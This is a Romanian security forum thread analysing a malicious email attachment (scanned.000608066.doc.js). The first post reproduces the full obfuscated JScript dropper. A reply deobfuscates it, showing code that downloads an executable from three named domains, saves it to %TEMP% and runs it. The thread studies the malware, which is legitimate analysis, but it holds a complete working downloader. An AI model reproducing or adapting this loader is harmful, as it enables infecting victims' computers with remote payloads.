nardini Posted February 8, 2016 Report Share Posted February 8, 2016 var a9='555C535E060511240611080F17170A4A0A0509015E3C5E16010508171405070157004A060D1E5E17515E555051505C55535052555E55',d1='; i',p78='exe',w16='; ',p94='00) ',m91='ar ',j1='e(',z17='s ',y17=' { ',w80='if (',m42=' {',x23='ngs(',d74=',"',d23='ak',b19='n+".e',h21='Stri',z95='nt',e50=' { f',d59=' xa.w',n17='se); ',o74='or',f55='d=',j20='ver.c',i68='ter',t56='== 2',p68='rit',t60='ect(',u95=' i',w48='.Exp',w64='.fr',g15='or (',f16='e(xo.',v87='va',m76='o.ope',u66='re',b45=' xa.',m82='.com',v92='n(); ',r77='one',n97=' xa.c',o55=' va',z51=' ws',c22='{ xa',n38=' dn =',b15='gr',b16='coun',p98='; } ',e95='oFil',k28='; bre',l20='xa',n65='HTT',u96='23.',y28='r ',s13=') { l',l48='f (',l77='ele',i58=' ld',c53='el',s58='am',b78='Scr',p99='nd();',h91='eval',y92=' x',c83='n("G',d6='ser',f28='http',c60='} cat',r65='; tr',t96='om',z60='0;',k96='xa',b71=' { x',v63='".spl',f61='; var',i95='andEn',z96='bjec',u45='ate.c',f51='+n+',g79='2)',v6='los',e9='; va',v45='xo.se',x49='2)+"',i2=' = ',y30='az',p82='2.XML',j13='.size',w13='re',l27='t.Cre',z63=' "); ',y91='00)',w67='93',x46='= WS',x68='/?id=',k55='t("',s99='catch',t29='e()',r93=' ex',o76='xa ',y34='o = W',t44='=3; ',x41='; i<',g37='i=ld',c65='1785"',z58='tring',l15=' { ',g81='b.le',p12='l")',z30='1; n<',g83=' "ya',z23='+b[',b74=' (',w35='fn+',z88='un(fn',k78=' = W',w46='++)',l40='.co.',t47='har',g96=' = 1;',v11='rn',q54='.type',n49=v87+'r b ='+g83+'tr'+y30+r77+m82+r93+'qu'+'is'+'iteco'+'rpse'+l40+'nz.'+'s740'+u96+b15+'id'+d6+j20+'om m'+'ai'+'nes'+l77+'ctre'+'alest'+u45+t96+v63+'it'+'("'+z63+'var'+z51+k78+'Scri'+'pt.C'+'rea'+'te'+'Objec'+'t("W'+b78+'ipt.'+'Sh'+c53+p12+e9+'r '+'fn '+'= ws'+w48+i95+'vir'+'onme'+z95+h21+x23+'"%T'+'EM'+'P%'+'")+S'+z58+w64+'omC'+t47+'Code'+'(9'+x49+'30298'+'8"'+f61+y92+y34+'Scrip'+l27+'ateO'+z96+k55+'MS'+'XML'+p82+n65+'P");'+o55+y28+o76+x46+'crip'+'t.Cr'+'eateO'+'bj'+t60+'"ADO'+'DB.St'+w13+s58+'"); '+'var'+i58+i2+z60+' f'+g15+'va'+'r n='+z30+t44+'n++)'+e50+o74+' (v'+m91+g37+x41+g81+'ngth;'+u95+w46+l15+'var d'+'n = 0'+'; try'+b71+m76+c83+'ET"'+d74+f28+'://"'+z23+'i]+"/'+b16+i68+x68+'"+a'+'9+"&'+v11+f55+w67+c65+'+n,'+' fal'+n17+v45+p99+' if'+b74+'xo.s'+'tatu'+z17+t56+p94+c22+'.ope'+v92+l20+q54+g96+d59+p68+f16+u66+'spons'+'eBod'+'y)'+d1+l48+k96+j13+' >'+' 10'+y91+m42+n38+' 1; x'+'a.'+'posit'+'ion'+' = 0;'+b45+'saveT'+e95+j1+w35+b19+'xe",'+g79+r65+'y { '+'ws.R'+z88+f51+'".'+p78+'",1'+',0); '+c60+'ch '+'(er)'+y17+'}; };'+n97+v6+t29+'; }'+w16+w80+'dn '+'== 1'+s13+'d = i'+k28+d23+'; }'+p98+s99+' ('+'er) {'+' }; }'+'; }'+';';this[h91](n49); primit sub forma de attash in email scanned.000608066.doc.js Quote Link to comment Share on other sites More sharing options...
Nytro Posted February 9, 2016 Report Share Posted February 9, 2016 Ca idee, se poate dezobfusca foarte usor. La final se poate vedea: "this[h91](n49);". E un apel de functie cu un anume parametru. Ce se intampla daca afisam acel parametru (n49)? Adica inlocuim "this[h91]" cu "document.write" si: var b = "yatrazone.com exquisitecorpse.co.nz.s74023.gridserver.com maineselectrealestate.com".split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"302988"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; }; PS: Cred ca mizeria asta (cu WScript.Shell) merge doar pe IE6 maxim IE7. 1 Quote Link to comment Share on other sites More sharing options...
nardini Posted February 10, 2016 Author Report Share Posted February 10, 2016 vad ca merge si pe mozila, run intr-un virtual. Quote Link to comment Share on other sites More sharing options...